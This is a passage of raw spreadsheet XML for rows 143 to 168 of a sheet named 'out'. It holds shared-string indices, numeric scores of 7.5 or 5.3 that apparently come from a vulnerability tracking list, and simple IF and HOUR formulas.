        <v>780</v>
      </c>
      <c r="B143" s="4" t="s">
        <v>1141</v>
      </c>
      <c r="C143" s="4" t="s">
        <v>1142</v>
      </c>
      <c r="D143" s="4" t="s">
        <v>1143</v>
      </c>
      <c r="E143" s="4" t="s">
        <v>1144</v>
      </c>
      <c r="F143" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G143" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H143" s="4">
        <v>7.5</v>
      </c>
      <c r="I143" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J143" s="4"/>
      <c r="K143" s="4"/>
      <c r="L143" s="4">
        <f>IF(out!$G143="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M143" s="4"/>
      <c r="N143" s="4"/>
      <c r="O143" s="13"/>
      <c r="P143" s="4"/>
      <c r="Q143" s="13">
        <f>HOUR(out!$P143 -out!$N143)</f>
        <v>0</v>
      </c>
      <c r="R143" s="18"/>
      <c r="S143" s="4"/>
      <c r="T143" s="4"/>
      <c r="U143" s="4"/>
      <c r="V143" s="7"/>
    </row>
    <row r="144" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A144" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B144" s="4" t="s">
        <v>1145</v>
      </c>
      <c r="C144" s="4" t="s">
        <v>1146</v>
      </c>
      <c r="D144" s="4" t="s">
        <v>1147</v>
      </c>
      <c r="E144" s="4" t="s">
        <v>1148</v>
      </c>
      <c r="F144" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G144" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H144" s="4">
        <v>7.5</v>
      </c>
      <c r="I144" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J144" s="4"/>
      <c r="K144" s="4"/>
      <c r="L144" s="4">
        <f>IF(out!$G144="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M144" s="4"/>
      <c r="N144" s="4"/>
      <c r="O144" s="13"/>
      <c r="P144" s="4"/>
      <c r="Q144" s="13">
        <f>HOUR(out!$P144 -out!$N144)</f>
        <v>0</v>
      </c>
      <c r="R144" s="18"/>
      <c r="S144" s="4"/>
      <c r="T144" s="4"/>
      <c r="U144" s="4"/>
      <c r="V144" s="7"/>
    </row>
    <row r="145" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A145" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B145" s="4" t="s">
        <v>1149</v>
      </c>
      <c r="C145" s="4" t="s">
        <v>1150</v>
      </c>
      <c r="D145" s="4" t="s">
        <v>1151</v>
      </c>
      <c r="E145" s="4" t="s">
        <v>1152</v>
      </c>
      <c r="F145" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G145" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H145" s="4">
        <v>7.5</v>
      </c>
      <c r="I145" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J145" s="4"/>
      <c r="K145" s="4"/>
      <c r="L145" s="4">
        <f>IF(out!$G145="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M145" s="4"/>
      <c r="N145" s="4"/>
      <c r="O145" s="13"/>
      <c r="P145" s="4"/>
      <c r="Q145" s="13">
        <f>HOUR(out!$P145 -out!$N145)</f>
        <v>0</v>
      </c>
      <c r="R145" s="18"/>
      <c r="S145" s="4"/>
      <c r="T145" s="4"/>
      <c r="U145" s="4"/>
      <c r="V145" s="7"/>
    </row>
    <row r="146" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A146" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B146" s="4" t="s">
        <v>1153</v>
      </c>
      <c r="C146" s="4" t="s">
        <v>1154</v>
      </c>
      <c r="D146" s="4" t="s">
        <v>1155</v>
      </c>
      <c r="E146" s="4" t="s">
        <v>1156</v>
      </c>
      <c r="F146" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G146" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H146" s="4">
        <v>7.5</v>
      </c>
      <c r="I146" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J146" s="4"/>
      <c r="K146" s="4"/>
      <c r="L146" s="4">
        <f>IF(out!$G146="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M146" s="4"/>
      <c r="N146" s="4"/>
      <c r="O146" s="13"/>
      <c r="P146" s="4"/>
      <c r="Q146" s="13">
        <f>HOUR(out!$P146 -out!$N146)</f>
        <v>0</v>
      </c>
      <c r="R146" s="18"/>
      <c r="S146" s="4"/>
      <c r="T146" s="4"/>
      <c r="U146" s="4"/>
      <c r="V146" s="7"/>
    </row>
    <row r="147" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A147" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B147" s="4" t="s">
        <v>1157</v>
      </c>
      <c r="C147" s="4" t="s">
        <v>1158</v>
      </c>
      <c r="D147" s="4" t="s">
        <v>1159</v>
      </c>
      <c r="E147" s="4" t="s">
        <v>1160</v>
      </c>
      <c r="F147" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G147" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H147" s="4">
        <v>7.5</v>
      </c>
      <c r="I147" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J147" s="4"/>
      <c r="K147" s="4"/>
      <c r="L147" s="4">
        <f>IF(out!$G147="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M147" s="4"/>
      <c r="N147" s="4"/>
      <c r="O147" s="13"/>
      <c r="P147" s="4"/>
      <c r="Q147" s="13">
        <f>HOUR(out!$P147 -out!$N147)</f>
        <v>0</v>
      </c>
      <c r="R147" s="18"/>
      <c r="S147" s="4"/>
      <c r="T147" s="4"/>
      <c r="U147" s="4"/>
      <c r="V147" s="7"/>
    </row>
    <row r="148" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A148" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B148" s="4" t="s">
        <v>1161</v>
      </c>
      <c r="C148" s="4" t="s">
        <v>1162</v>
      </c>
      <c r="D148" s="4" t="s">
        <v>1163</v>
      </c>
      <c r="E148" s="4" t="s">
        <v>1164</v>
      </c>
      <c r="F148" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G148" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H148" s="4">
        <v>7.5</v>
      </c>
      <c r="I148" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J148" s="4"/>
      <c r="K148" s="4"/>
      <c r="L148" s="4">
        <f>IF(out!$G148="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M148" s="4"/>
      <c r="N148" s="4"/>
      <c r="O148" s="13"/>
      <c r="P148" s="4"/>
      <c r="Q148" s="13">
        <f>HOUR(out!$P148 -out!$N148)</f>
        <v>0</v>
      </c>
      <c r="R148" s="18"/>
      <c r="S148" s="4"/>
      <c r="T148" s="4"/>
      <c r="U148" s="4"/>
      <c r="V148" s="7"/>
    </row>
    <row r="149" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A149" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B149" s="4" t="s">
        <v>1165</v>
      </c>
      <c r="C149" s="4" t="s">
        <v>1166</v>
      </c>
      <c r="D149" s="4" t="s">
        <v>1167</v>
      </c>
      <c r="E149" s="4" t="s">
        <v>1168</v>
      </c>
      <c r="F149" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G149" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H149" s="4">
        <v>7.5</v>
      </c>
      <c r="I149" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J149" s="4"/>
      <c r="K149" s="4"/>
      <c r="L149" s="4">
        <f>IF(out!$G149="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M149" s="4"/>
      <c r="N149" s="4"/>
      <c r="O149" s="13"/>
      <c r="P149" s="4"/>
      <c r="Q149" s="13">
        <f>HOUR(out!$P149 -out!$N149)</f>
        <v>0</v>
      </c>
      <c r="R149" s="18"/>
      <c r="S149" s="4"/>
      <c r="T149" s="4"/>
      <c r="U149" s="4"/>
      <c r="V149" s="7"/>
    </row>
    <row r="150" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A150" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B150" s="4" t="s">
        <v>1169</v>
      </c>
      <c r="C150" s="4" t="s">
        <v>1170</v>
      </c>
      <c r="D150" s="4" t="s">
        <v>1171</v>
      </c>
      <c r="E150" s="4" t="s">
        <v>1172</v>
      </c>
      <c r="F150" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G150" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H150" s="4">
        <v>7.5</v>
      </c>
      <c r="I150" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J150" s="4"/>
      <c r="K150" s="4"/>
      <c r="L150" s="4">
        <f>IF(out!$G150="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M150" s="4"/>
      <c r="N150" s="4"/>
      <c r="O150" s="13"/>
      <c r="P150" s="4"/>
      <c r="Q150" s="13">
        <f>HOUR(out!$P150 -out!$N150)</f>
        <v>0</v>
      </c>
      <c r="R150" s="18"/>
      <c r="S150" s="4"/>
      <c r="T150" s="4"/>
      <c r="U150" s="4"/>
      <c r="V150" s="7"/>
    </row>
    <row r="151" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A151" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B151" s="4" t="s">
        <v>1173</v>
      </c>
      <c r="C151" s="4" t="s">
        <v>1174</v>
      </c>
      <c r="D151" s="4" t="s">
        <v>1175</v>
      </c>
      <c r="E151" s="4" t="s">
        <v>1176</v>
      </c>
      <c r="F151" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G151" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H151" s="4">
        <v>7.5</v>
      </c>
      <c r="I151" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J151" s="4"/>
      <c r="K151" s="4"/>
      <c r="L151" s="4">
        <f>IF(out!$G151="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M151" s="4"/>
      <c r="N151" s="4"/>
      <c r="O151" s="13"/>
      <c r="P151" s="4"/>
      <c r="Q151" s="13">
        <f>HOUR(out!$P151 -out!$N151)</f>
        <v>0</v>
      </c>
      <c r="R151" s="18"/>
      <c r="S151" s="4"/>
      <c r="T151" s="4"/>
      <c r="U151" s="4"/>
      <c r="V151" s="7"/>
    </row>
    <row r="152" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A152" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B152" s="4" t="s">
        <v>1177</v>
      </c>
      <c r="C152" s="4" t="s">
        <v>1178</v>
      </c>
      <c r="D152" s="4" t="s">
        <v>1179</v>
      </c>
      <c r="E152" s="4" t="s">
        <v>1180</v>
      </c>
      <c r="F152" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G152" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H152" s="4">
        <v>7.5</v>
      </c>
      <c r="I152" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J152" s="4"/>
      <c r="K152" s="4"/>
      <c r="L152" s="4">
        <f>IF(out!$G152="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M152" s="4"/>
      <c r="N152" s="4"/>
      <c r="O152" s="13"/>
      <c r="P152" s="4"/>
      <c r="Q152" s="13">
        <f>HOUR(out!$P152 -out!$N152)</f>
        <v>0</v>
      </c>
      <c r="R152" s="18"/>
      <c r="S152" s="4"/>
      <c r="T152" s="4"/>
      <c r="U152" s="4"/>
      <c r="V152" s="7"/>
    </row>
    <row r="153" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A153" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B153" s="4" t="s">
        <v>1181</v>
      </c>
      <c r="C153" s="4" t="s">
        <v>1182</v>
      </c>
      <c r="D153" s="4" t="s">
        <v>1183</v>
      </c>
      <c r="E153" s="4" t="s">
        <v>1184</v>
      </c>
      <c r="F153" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G153" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H153" s="4">
        <v>5.3</v>
      </c>
      <c r="I153" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J153" s="4"/>
      <c r="K153" s="4"/>
      <c r="L153" s="4">
        <f>IF(out!$G153="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M153" s="4"/>
      <c r="N153" s="4"/>
      <c r="O153" s="13"/>
      <c r="P153" s="4"/>
      <c r="Q153" s="13">
        <f>HOUR(out!$P153 -out!$N153)</f>
        <v>0</v>
      </c>
      <c r="R153" s="18"/>
      <c r="S153" s="4"/>
      <c r="T153" s="4"/>
      <c r="U153" s="4"/>
      <c r="V153" s="7"/>
    </row>
    <row r="154" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A154" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B154" s="4" t="s">
        <v>1185</v>
      </c>
      <c r="C154" s="4" t="s">
        <v>1186</v>
      </c>
      <c r="D154" s="4" t="s">
        <v>1187</v>
      </c>
      <c r="E154" s="4" t="s">
        <v>1188</v>
      </c>
      <c r="F154" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G154" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H154" s="4">
        <v>7.5</v>
      </c>
      <c r="I154" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J154" s="4"/>
      <c r="K154" s="4"/>
      <c r="L154" s="4">
        <f>IF(out!$G154="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M154" s="4"/>
      <c r="N154" s="4"/>
      <c r="O154" s="13"/>
      <c r="P154" s="4"/>
      <c r="Q154" s="13">
        <f>HOUR(out!$P154 -out!$N154)</f>
        <v>0</v>
      </c>
      <c r="R154" s="18"/>
      <c r="S154" s="4"/>
      <c r="T154" s="4"/>
      <c r="U154" s="4"/>
      <c r="V154" s="7"/>
    </row>
    <row r="155" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A155" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B155" s="4" t="s">
        <v>1189</v>
      </c>
      <c r="C155" s="4" t="s">
        <v>1190</v>
      </c>
      <c r="D155" s="4" t="s">
        <v>1191</v>
      </c>
      <c r="E155" s="4" t="s">
        <v>1192</v>
      </c>
      <c r="F155" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G155" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H155" s="4">
        <v>7.5</v>
      </c>
      <c r="I155" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J155" s="4"/>
      <c r="K155" s="4"/>
      <c r="L155" s="4">
        <f>IF(out!$G155="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M155" s="4"/>
      <c r="N155" s="4"/>
      <c r="O155" s="13"/>
      <c r="P155" s="4"/>
      <c r="Q155" s="13">
        <f>HOUR(out!$P155 -out!$N155)</f>
        <v>0</v>
      </c>
      <c r="R155" s="18"/>
      <c r="S155" s="4"/>
      <c r="T155" s="4"/>
      <c r="U155" s="4"/>
      <c r="V155" s="7"/>
    </row>
    <row r="156" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A156" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B156" s="4" t="s">
        <v>1193</v>
      </c>
      <c r="C156" s="4" t="s">
        <v>1194</v>
      </c>
      <c r="D156" s="4" t="s">
        <v>1195</v>
      </c>
      <c r="E156" s="4" t="s">
        <v>1196</v>
      </c>
      <c r="F156" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G156" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H156" s="4">
        <v>7.5</v>
      </c>
      <c r="I156" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J156" s="4"/>
      <c r="K156" s="4"/>
      <c r="L156" s="4">
        <f>IF(out!$G156="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M156" s="4"/>
      <c r="N156" s="4"/>
      <c r="O156" s="13"/>
      <c r="P156" s="4"/>
      <c r="Q156" s="13">
        <f>HOUR(out!$P156 -out!$N156)</f>
        <v>0</v>
      </c>
      <c r="R156" s="18"/>
      <c r="S156" s="4"/>
      <c r="T156" s="4"/>
      <c r="U156" s="4"/>
      <c r="V156" s="7"/>
    </row>
    <row r="157" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A157" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B157" s="4" t="s">
        <v>1197</v>
      </c>
      <c r="C157" s="4" t="s">
        <v>1198</v>
      </c>
      <c r="D157" s="4" t="s">
        <v>1199</v>
      </c>
      <c r="E157" s="4" t="s">
        <v>1200</v>
      </c>
      <c r="F157" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G157" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H157" s="4">
        <v>7.5</v>
      </c>
      <c r="I157" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J157" s="4"/>
      <c r="K157" s="4"/>
      <c r="L157" s="4">
        <f>IF(out!$G157="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M157" s="4"/>
      <c r="N157" s="4"/>
      <c r="O157" s="13"/>
      <c r="P157" s="4"/>
      <c r="Q157" s="13">
        <f>HOUR(out!$P157 -out!$N157)</f>
        <v>0</v>
      </c>
      <c r="R157" s="18"/>
      <c r="S157" s="4"/>
      <c r="T157" s="4"/>
      <c r="U157" s="4"/>
      <c r="V157" s="7"/>
    </row>
    <row r="158" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A158" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B158" s="4" t="s">
        <v>1201</v>
      </c>
      <c r="C158" s="4" t="s">
        <v>1202</v>
      </c>
      <c r="D158" s="4" t="s">
        <v>1203</v>
      </c>
      <c r="E158" s="4" t="s">
        <v>1204</v>
      </c>
      <c r="F158" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G158" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H158" s="4">
        <v>7.5</v>
      </c>
      <c r="I158" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J158" s="4"/>
      <c r="K158" s="4"/>
      <c r="L158" s="4">
        <f>IF(out!$G158="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M158" s="4"/>
      <c r="N158" s="4"/>
      <c r="O158" s="13"/>
      <c r="P158" s="4"/>
      <c r="Q158" s="13">
        <f>HOUR(out!$P158 -out!$N158)</f>
        <v>0</v>
      </c>
      <c r="R158" s="18"/>
      <c r="S158" s="4"/>
      <c r="T158" s="4"/>
      <c r="U158" s="4"/>
      <c r="V158" s="7"/>
    </row>
    <row r="159" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A159" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B159" s="4" t="s">
        <v>1205</v>
      </c>
      <c r="C159" s="4" t="s">
        <v>1206</v>
      </c>
      <c r="D159" s="4" t="s">
        <v>1207</v>
      </c>
      <c r="E159" s="4" t="s">
        <v>1208</v>
      </c>
      <c r="F159" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G159" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H159" s="4">
        <v>7.5</v>
      </c>
      <c r="I159" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J159" s="4"/>
      <c r="K159" s="4"/>
      <c r="L159" s="4">
        <f>IF(out!$G159="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M159" s="4"/>
      <c r="N159" s="4"/>
      <c r="O159" s="13"/>
      <c r="P159" s="4"/>
      <c r="Q159" s="13">
        <f>HOUR(out!$P159 -out!$N159)</f>
        <v>0</v>
      </c>
      <c r="R159" s="18"/>
      <c r="S159" s="4"/>
      <c r="T159" s="4"/>
      <c r="U159" s="4"/>
      <c r="V159" s="7"/>
    </row>
    <row r="160" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A160" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B160" s="4" t="s">
        <v>1209</v>
      </c>
      <c r="C160" s="4" t="s">
        <v>1210</v>
      </c>
      <c r="D160" s="4" t="s">
        <v>1211</v>
      </c>
      <c r="E160" s="4" t="s">
        <v>1212</v>
      </c>
      <c r="F160" s="4" t="s">
        <v>873</v>
      </c>
      <c r="G160" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H160" s="4">
        <v>7.5</v>
      </c>
      <c r="I160" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J160" s="4"/>
      <c r="K160" s="4"/>
      <c r="L160" s="4">
        <f>IF(out!$G160="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M160" s="4"/>
      <c r="N160" s="4"/>
      <c r="O160" s="13"/>
      <c r="P160" s="4"/>
      <c r="Q160" s="13">
        <f>HOUR(out!$P160 -out!$N160)</f>
        <v>0</v>
      </c>
      <c r="R160" s="18"/>
      <c r="S160" s="4"/>
      <c r="T160" s="4"/>
      <c r="U160" s="4"/>
      <c r="V160" s="7"/>
    </row>
    <row r="161" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A161" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B161" s="4" t="s">
        <v>1213</v>
      </c>
      <c r="C161" s="4" t="s">
        <v>1214</v>
      </c>
      <c r="D161" s="4" t="s">
        <v>1215</v>
      </c>
      <c r="E161" s="4" t="s">
        <v>1216</v>
      </c>
      <c r="F161" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G161" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H161" s="4">
        <v>7.5</v>
      </c>
      <c r="I161" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J161" s="4"/>
      <c r="K161" s="4"/>
      <c r="L161" s="4">
        <f>IF(out!$G161="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M161" s="4"/>
      <c r="N161" s="4"/>
      <c r="O161" s="13"/>
      <c r="P161" s="4"/>
      <c r="Q161" s="13">
        <f>HOUR(out!$P161 -out!$N161)</f>
        <v>0</v>
      </c>
      <c r="R161" s="18"/>
      <c r="S161" s="4"/>
      <c r="T161" s="4"/>
      <c r="U161" s="4"/>
      <c r="V161" s="7"/>
    </row>
    <row r="162" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A162" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B162" s="4" t="s">
        <v>1217</v>
      </c>
      <c r="C162" s="4" t="s">
        <v>1218</v>
      </c>
      <c r="D162" s="4" t="s">
        <v>1219</v>
      </c>
      <c r="E162" s="4" t="s">
        <v>1220</v>
      </c>
      <c r="F162" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G162" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H162" s="4">
        <v>7.5</v>
      </c>
      <c r="I162" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J162" s="4"/>
      <c r="K162" s="4"/>
      <c r="L162" s="4">
        <f>IF(out!$G162="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M162" s="4"/>
      <c r="N162" s="4"/>
      <c r="O162" s="13"/>
      <c r="P162" s="4"/>
      <c r="Q162" s="13">
        <f>HOUR(out!$P162 -out!$N162)</f>
        <v>0</v>
      </c>
      <c r="R162" s="18"/>
      <c r="S162" s="4"/>
      <c r="T162" s="4"/>
      <c r="U162" s="4"/>
      <c r="V162" s="7"/>
    </row>
    <row r="163" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A163" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B163" s="4" t="s">
        <v>1221</v>
      </c>
      <c r="C163" s="4" t="s">
        <v>1222</v>
      </c>
      <c r="D163" s="4" t="s">
        <v>1223</v>
      </c>
      <c r="E163" s="4" t="s">
        <v>1224</v>
      </c>
      <c r="F163" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G163" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H163" s="4">
        <v>7.5</v>
      </c>
      <c r="I163" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J163" s="4"/>
      <c r="K163" s="4"/>
      <c r="L163" s="4">
        <f>IF(out!$G163="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M163" s="4"/>
      <c r="N163" s="4"/>
      <c r="O163" s="13"/>
      <c r="P163" s="4"/>
      <c r="Q163" s="13">
        <f>HOUR(out!$P163 -out!$N163)</f>
        <v>0</v>
      </c>
      <c r="R163" s="18"/>
      <c r="S163" s="4"/>
      <c r="T163" s="4"/>
      <c r="U163" s="4"/>
      <c r="V163" s="7"/>
    </row>
    <row r="164" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A164" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B164" s="4" t="s">
        <v>1225</v>
      </c>
      <c r="C164" s="4" t="s">
        <v>1226</v>
      </c>
      <c r="D164" s="4" t="s">
        <v>1227</v>
      </c>
      <c r="E164" s="4" t="s">
        <v>1228</v>
      </c>
      <c r="F164" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G164" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H164" s="4">
        <v>7.5</v>
      </c>
      <c r="I164" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J164" s="4"/>
      <c r="K164" s="4"/>
      <c r="L164" s="4">
        <f>IF(out!$G164="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M164" s="4"/>
      <c r="N164" s="4"/>
      <c r="O164" s="13"/>
      <c r="P164" s="4"/>
      <c r="Q164" s="13">
        <f>HOUR(out!$P164 -out!$N164)</f>
        <v>0</v>
      </c>
      <c r="R164" s="18"/>
      <c r="S164" s="4"/>
      <c r="T164" s="4"/>
      <c r="U164" s="4"/>
      <c r="V164" s="7"/>
    </row>
    <row r="165" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A165" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B165" s="4" t="s">
        <v>1229</v>
      </c>
      <c r="C165" s="4" t="s">
        <v>1230</v>
      </c>
      <c r="D165" s="4" t="s">
        <v>1231</v>
      </c>
      <c r="E165" s="4" t="s">
        <v>1232</v>
      </c>
      <c r="F165" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G165" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H165" s="4">
        <v>7.5</v>
      </c>
      <c r="I165" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J165" s="4"/>
      <c r="K165" s="4"/>
      <c r="L165" s="4">
        <f>IF(out!$G165="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M165" s="4"/>
      <c r="N165" s="4"/>
      <c r="O165" s="13"/>
      <c r="P165" s="4"/>
      <c r="Q165" s="13">
        <f>HOUR(out!$P165 -out!$N165)</f>
        <v>0</v>
      </c>
      <c r="R165" s="18"/>
      <c r="S165" s="4"/>
      <c r="T165" s="4"/>
      <c r="U165" s="4"/>
      <c r="V165" s="7"/>
    </row>
    <row r="166" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A166" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B166" s="4" t="s">
        <v>1233</v>
      </c>
      <c r="C166" s="4" t="s">
        <v>1234</v>
      </c>
      <c r="D166" s="4" t="s">
        <v>1235</v>
      </c>
      <c r="E166" s="4" t="s">
        <v>1236</v>
      </c>
      <c r="F166" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G166" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H166" s="4">
        <v>7.5</v>
      </c>
      <c r="I166" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J166" s="4"/>
      <c r="K166" s="4"/>
      <c r="L166" s="4">
        <f>IF(out!$G166="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M166" s="4"/>
      <c r="N166" s="4"/>
      <c r="O166" s="13"/>
      <c r="P166" s="4"/>
      <c r="Q166" s="13">
        <f>HOUR(out!$P166 -out!$N166)</f>
        <v>0</v>
      </c>
      <c r="R166" s="18"/>
      <c r="S166" s="4"/>
      <c r="T166" s="4"/>
      <c r="U166" s="4"/>
      <c r="V166" s="7"/>
    </row>
    <row r="167" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A167" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B167" s="4" t="s">
        <v>1237</v>
      </c>
      <c r="C167" s="4" t="s">
        <v>1238</v>
      </c>
      <c r="D167" s="4" t="s">
        <v>1239</v>
      </c>
      <c r="E167" s="4" t="s">
        <v>1240</v>
      </c>
      <c r="F167" s="4" t="s">
        <v>38</v>
      </c>
      <c r="G167" s="4" t="s">
        <v>39</v>
      </c>
      <c r="H167" s="4">
        <v>7.5</v>
      </c>
      <c r="I167" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J167" s="4"/>
      <c r="K167" s="4"/>
      <c r="L167" s="4">
        <f>IF(out!$G167="None",1,0)</f>
        <v>1</v>
      </c>
      <c r="M167" s="4"/>
      <c r="N167" s="4"/>
      <c r="O167" s="13"/>
      <c r="P167" s="4"/>
      <c r="Q167" s="13">
        <f>HOUR(out!$P167 -out!$N167)</f>
        <v>0</v>
      </c>
      <c r="R167" s="18"/>
      <c r="S167" s="4"/>
      <c r="T167" s="4"/>
      <c r="U167" s="4"/>
      <c r="V167" s="7"/>
    </row>
    <row r="168" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A168" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B168" s="4" t="s">
        <v>1241</v>
      </c>
      <c r="C168" s="4" t="s">
        <v>1242</v>
